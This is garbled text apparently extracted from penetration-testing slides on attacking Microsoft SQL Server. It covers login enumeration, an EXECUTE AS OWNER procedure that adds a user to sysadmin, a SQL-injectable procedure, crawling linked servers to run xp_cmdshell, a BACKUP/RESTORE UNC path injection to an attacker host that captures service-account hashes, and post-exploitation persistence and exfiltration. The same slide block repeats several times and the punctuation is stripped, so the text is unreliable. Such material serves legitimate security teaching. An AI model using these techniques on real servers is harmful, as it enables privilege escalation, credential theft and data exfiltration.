Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
